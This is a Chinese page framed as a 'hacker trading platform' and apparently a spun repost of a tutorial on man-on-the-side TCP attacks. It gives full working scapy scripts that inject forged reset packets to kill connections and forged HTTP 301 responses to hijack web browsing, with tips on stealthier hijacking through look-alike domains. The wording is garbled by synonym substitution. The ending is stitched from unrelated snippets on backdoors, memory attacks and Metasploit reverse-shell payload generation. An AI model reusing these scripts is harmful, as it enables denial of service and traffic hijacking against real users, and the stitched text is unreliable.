黑客交易平台:MOTS进犯之TCP进犯

访客4年前 (2020-01-15)黑客资讯1207

1. 概述

继续进行MOTS类型侵犯 *** 的发展。这儿再次着重一下，MOTS 是指 Man-On-The-Side，是一种在旁路监听方式下的侵犯 *** ;和 MITM 不同，MITM 是指 Man-In-The-Middle，是中间人侵犯。MOTS 其原理是监听与结构呼应数据包，并在正常数据包回来之前刺进假造的数据包。其完成的中心条件是 TCP/IP 协议自身完成时并没有考虑这方面的安全问题。MOTS 完成的全体逻辑如下所示，其间 Attack 是旁路监听方式，而不是直接串在 *** 中的。这种类型的侵犯比中间人侵犯相对隐秘，其正常情况下仅仅监听，需求侵犯时才进行侵犯，而且侵犯时只需求发送少数报文，不会呈现大流量。所以具有荫蔽、难以发现、侵犯作用显着等特色。

前面现已进行了MOTS相关原理及依据UDP运用侵犯的描述。不了解的可以点击这儿:

《MOTS侵犯技能剖析》

《MOTS侵犯之UDP侵犯》

学习过TCP/IP的同学都应该了解，传输层有两种协协议:TCP和UDP，这两种协议自身的特色决议了其运用场景的不同。TCP作为一种牢靠的协议，其具有面向衔接、牢靠等特色。所以许多运用都依据TCP作开发，如运用最多的web运用。针对TCP的侵犯这儿首要介绍两种 *** ：DOS和绑架，其他类型的侵犯，我们可以完善、弥补。

2. DOS侵犯2.1 原理

我们知道，针对某一IP的特色端口进行勘探其是否敞开时，一般发送SYN，若其端口敞开，对方回应SYN+ACK；若端口不敞开，则回应reset。所以针对TCP的运用，我们进行DOS时，可以监听其SYN包，一旦有客户端发送SYN，直接给其回应reset，而且保证假造的reset比正常的呼应包早到，即可到达DOS的作用。其完成逻辑如下图所示：

2.2 三次握手DOS

要完成对TCP运用的DOS，需求依照以下几步完成：

1、结构reset报文

2、监听 *** 中的TCP SYN报文

3、监听到TCP SYN报文时，回应reset报文

2.2.1 设备scapy库

完成TCP的DOS侵犯是通过设备python的第三方库scapy库来完成的，python自身没有这个库，需求手艺设备，详细设备 *** 我们依据自己的系统与python版别自行设备，自己检验是运用Win10 Pro+Python3.6。python 3.6版别可以通过指令: pip install scapy来设备。

2.2.2 结构reset报文

reset报文结构相对较简略，一般的TCP报文，仅仅其reset和ack方位一，且ack=前一报文的seq+1。对方收到reset报文后，其TCP层当即开释TCP衔接，reset报文比fin报文开释衔接时效率高许多，正常的TCP封闭运用FIN时需求四个报文，而运用reset来开释的话只需求一个报文。

2.2.3 监听并侵犯

侵犯程序代码如下，我们可以依据实践情况批改：

#coding:utf-8

”’

date:2017-07-07

author:feiniao

Version:1.0

”’

from scapy.all import *

import random

”’

1、windows绑定本机网卡,首要运用show_interfaces()查看相关网卡

2、再运用conf.iface=”绑定相应的网卡

3、linux需求在sniff()中指定相应的网卡

”’

conf.iface=’Intel(R) Dual Band Wireless-AC 8260′

#随机ip字段的id和ttl

ipid = random.randint(1,65535)

ipttl = random.randint(45,80)

tcpseq = random.randint(1,4294967295)

def buying(tcpmots):

resp = Ether()/IP()/TCP()

#结构TCP相关字段

resp[TCP].dport = tcpmots[TCP].sport

resp[TCP].sport = tcpmots[TCP].dport

resp[TCP].ack = tcpmots[TCP].seq + 1

resp[TCP].flags = “RA”

resp[TCP].window = 0

#结构IP包头

resp
黑客交易平台:MOTS进犯之TCP进犯
[IP].src = tcpmots[IP].dst

resp[IP].dst = tcpmots[IP].src

resp[IP].ttl = ipttl

resp[IP].id = ipid

#结构以太网包头

resp[Ether].src = tcpmots[Ether].dst

resp[Ether].dst = tcpmots[Ether].src

#发送结构的TCP DOS 包

sendp(resp,count=1)

print(“TCP DOS 侵犯”,resp[IP].dst,”成功”)

if __name__ == ‘__main__’:

sniff(prn=buying,filter=’tcp[tcpflags]&(tcp-syn)!=0 and tcp[tcpflags]&(tcp-ack)==0′)

找到侵犯程序地点的目录，直接输入python tcpsyndos.py即可。

我们侵犯检验的情况或许和我相同，收到客户端的SYN包今后，分明发送了reset报文，而且对方也收到了，可是客户端就是不开释衔接，而且正常的呼应报文过来今后还可以正常交互。其报文交互如下所示：

通过上面的交互可以看到，192.168.0.105发送一个SYN报文，118.184.32.93首要回应了一个reset报文，其rst和ack位均置一。可是192.168.0.105并没有开释衔接，然后收到118.184.32.93的syn+ack报文，反而树立成功了TCP的三次握手，后边还正常进行数据的交互。正常情况下，客户端收到reset报文时确实应该是直接开释TCP衔接，可是侵犯在不断进化与晋级的一起，防护也同样在晋级。自己检验时运用的是Windows10 Pro版别，经剖析，其应该是操作系统过滤了reset报文，至少是过滤了三次握手时的reset包，所以才导致衔接并没有开释而且可以正常交互。

端系统对RST报文的过滤，我们可参阅: http://www.vants.org/?post=140

假设有检验时呈现侵犯者发送reset包的而且正常开释衔接的，那么其端系统是没有过滤reset报文的，检验成功的小伙伴可以联络我，我来完善一下。

2.2.4 侵犯对立

已然客户端过滤了reset那么，那么就没有 *** 针对三次握手时进行DOS了？呵呵！ *** 仍是有许多种的，我们知道，客户端发送seq=x时，对方呼应报文的ack=x+1，若ack!=x+1，那么客户端肯定会呼应reset的。这样话，就有了下面之一种针对 *** ，改动ack的巨细，只需求把上面的代码作下面的批改即可：

resp[TCP].ack = 0 //ack巨细可以恣意指定

resp[TCP].flags= “SA”

这样批改的话，可以到达DOS的作用，实践侵犯作用如下：

2.3 数据交互DOS

这种DOS的侵犯场景为数据交互时，若阅读某个页面时，传输数据时等。其只需求监听客户端的行为，并对特定的 *** 或内容进行DOS。

这儿自己完成时，只需有PUSH行为，就给DOS。代码如下：

#coding:utf-8

”’

date:2017-07-11

author:feiniao

Version:1.0

”’

from scapy.all import *

import random

”’

1、windows绑定本机网卡,首要运用show_interfaces()查看相关网卡

2、再运用conf.iface=”绑定相应的网卡

3、linux需求在sniff()中指定相应的网卡

”’

conf.iface=’Intel(R) Dual Band Wireless-AC 8260′

#随机ip字段的id和ttl

ipid = random.randint(1,65535)

ipttl = random.randint(45,80)

tcpseq = random.randint(1,4294967295)

def buying(tcpmots):

resp = Ether()/IP()/TCP()

#结构TCP相关字段

resp[TCP].dport = tcpmots[TCP].sport

resp[TCP].sport = tcpmots[TCP].dport

resp[TCP].seq = tcpmots[TCP].ack

resp[TCP].ack = tcpmots[TCP].seq + len(tcpmots[TCP].load)

resp[TCP].flags = “RA”

resp[TCP].window = 0

#结构IP包头

resp[IP].src = tcpmots[IP].dst

resp[IP].dst = tcpmots[IP].src

resp[IP].ttl = ipttl

resp[IP].id = ipid

#结构以太网包头

resp[Ether].src = tcpmots[Ether].dst

resp[Ether].dst = tcpmots[Ether].src

#发送结构的TCP DOS 包

sendp(resp,count=1)

print(“TCP DOS 侵犯”,resp[IP].dst,”成功”)

if __name__ == ‘__main__’:

sniff(prn=buying,filter=’tcp[tcpflags]&(tcp-push)!=0 and dst host 118.184.32.93′)

检验时，发现客户端并没有过滤PUSH数据交互时的reset报文，上面过滤了三次握手时的reset报文，可见reset报文的过滤在TCP层面可以有针对性的过滤。针对数据交互的DOS：

这儿我们可以依据详细需求进行完善。

2.4 对立

2.4.1 加密

运用VPX、署理、https等 ***

2.4.2 协议优化

以下朴实个人观点：

针对MOTS类型的 TCP DOS *** 的侵犯，客户端发送syn报文后，一方面可以直接过滤reset报文，另一方面收到reset或许syn+ack可是ack序号不正确的报文不当即处理，而是等一段时刻(如10ms)，在这段时刻内若有正常的syn+ack报文过来，则正常树立衔接。

3. TCP绑架与诈骗3.1 原理

很简略，在监听到客户端发送央求时，发送一个假造的呼应，而且比正常的呼应早到，这样即可到达诈骗的作用。日子中常见的如翻开网页时刺进尾巴、广告等 *** 一般情况下都是通过这种 *** 完成的。

3.2 完成

这儿完成一个翻开恣意网站时，回来一个301，并跳转到freebuf的绑架。代码如下，工作很简略，

#c oding:utf-8

”’

name:http mots attack

date:2017-07-11

author:feiniao

Version:1.0

”’

from scapy.all import *

import random

”’

1、windows绑定本机网卡,首要运用show_interfaces()查看相关网卡

2、再运用conf.iface=”绑定相应的网卡

3、linux需求在sniff()中指定相应的网卡

”’

conf.iface=’Intel(R) Dual Band Wireless-AC 8260′

ipid = random.randint(1,65535)

ipttl = random.randint(45,80)

tcpseq = random.randint(1,4294967295)#HTTP 301

data = “HTTP/1.0 301 Moved Permanentlyrn”

data += “Server: Apache/1.3.17 (Unix) PHP/4.0.4rn”

data += “Location: http://www.freebuf.com rn”

data += “Content-Type: text/html; charset=iso-8859-1rn”

data += “Connection: closern”

data += “rn”

def buying(httpmots):

resp = Ether()/IP()/TCP()/data

#结构TCP相关字段

resp[TCP].dport = httpmots[TCP].sport

resp[TCP].sport = httpmots[TCP].dport

resp[TCP].seq = httpmots[TCP].ack

resp[TCP].ack = httpmots[TCP].seq + len(httpmots[TCP].load)

resp[TCP].flags = “A”

resp[TCP].window = 12345

#结构IP包头

resp[IP].src = httpmots[IP].dst

resp[IP].dst = httpmots[IP].src

resp[IP].ttl = ipttl

resp[IP].id = ipid

#结构以太网包头

resp[Ether].src = httpmots[Ether].dst

resp[Ether].dst = httpmots[Ether].src

#发送结构的TCP DOS 包

sendp(resp,count=1)

print(“HTTP绑架”,resp[IP].src,”成功”)

if __name__ == ‘__main__’:

#过滤HTTP的GET央求

sniff(prn=buying,filter=’tcp[((tcp[12:1]&0xf0)>>2):4]=0×47455420 and not host 120.55.226.207′)

侵犯作用如下，翻开 www.cisco.com ,回来的是www.freebuf.com的内容。有的同学或许说这个太直观了，很简单发现，cisco和freebuf不同仍是很大的，假设回来的是 www.cisc0.com 、 www.clsco.com 、甚至前面有大牛写的“同形异义”，这种 *** 就欠好发现了。

运营X做绑架的 *** 之一为:回来302，回来内容中有 iframe，通过 iframe 加载正常的页面，这样的话很就难发现了。

上面完成时花费了很长时刻，一向运用 python 的 scapy_http.http 库来完成，可是在发送的时分一向报错，因为自己python 新手，终究仍是通过 scapy 结构 http 的数据来完成。有通过 scapy_http.http 库完成的大牛，可以贡献一下相关代码，嘿嘿！在这儿先谢过。

3.3 对立

我们自己总结吧，我上面也写了许多。这儿就不作太多描述了。

黑客交易平台:MOTS进犯之TCP进犯

在发起客户端，输入暗码和地址
黑客交易平台
23f07e13e192 docker.io/tomcat "catalina.sh run" 7 weeks ago Up 7 weeks 8080/tcp, 0.0.0.0:8089->80/tcp hungry_bassiMOTS攻击之TCP攻击

黑客交易平台运用Wayback Machine或许会导致误报，即有些JavaScript文件或许在服务器上现已不存在了。收集JavaScript文件的URL列表后，可以运用curl快速查看服务器上JavaScript文件的情况。表2 APT34组织运用的两个PowerShell后门2. 社区贡献攻略，请参照官方给出的代码规范进行开发，官方链接，中文链接实行流程 x -> a -> u -> r -> h （躲藏 & 工作 m ） -> m （挖矿），为了实行实在的挖矿，绕了一大圈。

你可以挑选运用随意率性模块发起侵犯侵犯，我们先运用端口扫描器pscan来间断操作演示。 Kali Linux战略因此，远程侵犯者还可以轻易地通过生成并向服务器发送正确央求的 *** 下载访问用户web界面账户的数据。用户web界面账户没有像2FA（双要素认证）这样的安全防护层。毕竟，侵犯者就可以完全控制受害者的家，随意开关灯光、水阀，甚至翻开家门。我们曾以为的夸姣的智能日子转眼成了噩梦。我们将实验进程中发现的缝隙均一一提交给了相应的厂商，他们也都积极地批改了这些安全问题。在Users面板添加用户isafe.cc暗码为www.isafe.cc，如图6黑客交易平台

3、已设备AZF的虚拟机或系统。

假设你觉得Windows可实行程序无法对Windows电脑构成满意的损害，那你现在可以检验通过结构恶意MSI文件来侵犯Linux系统了。 block_size = mmc_get_device_blocksize();

我们也鼓动你阅读Alex lonescu和Rafal Wojtczuk的BlackHat 2015/2016的演说，将有很大帮忙：https://github.com/emsec/ChameleonMini/wiki再来看isActive *** 。 MOTS攻击之TCP攻击

黑客交易平台NUC是不同的。PCILeech在找到政策之前假设遇到不可读的内存就会失利。走运的是，工作时服务表的地址是静态的，在从头发起之间不会改动。这适用于全部已检验的系统。找到地址最简略的 *** 是通过在同一系统或相似系统上以EFI方式用USB引导发起Linux。一旦发起就调用指令cat /sys/
MOTS攻击之TCP攻击
firmware/efi/runtime来查看工作时服务表的物理地址。一旦知道地址是0x3b294e18，我们可以调用指令初步之前，请在你的sources.list文件（在我们的环境中，该文件途径为/etc/apt/sources.list）中添加下面这行代码[详细配备进程]：首要，我们要奉告Metasploit，我们要运用的exploit是shell_reverse_tcp。接下来，我们要设置需求进行侵犯的政策主机IP地址，然后再设置需求监听的端口。请注意，不要运用默许的4444端口，因为或许现已有人正在监听这个端口了，所以我们在这儿运用的是8118端口。终究，为了让我们所生成的Shell代码可以兼容Python，我们就要运用一个名为“alpha_mixed”的编码机制了，它可以帮忙我们移除掉某些政策服务器无法辨认的特别字符。接下来，Metasploit会输出相应的Python代码，你可以直接将代码复制粘贴进我们的“exploit_gen.py”文件中。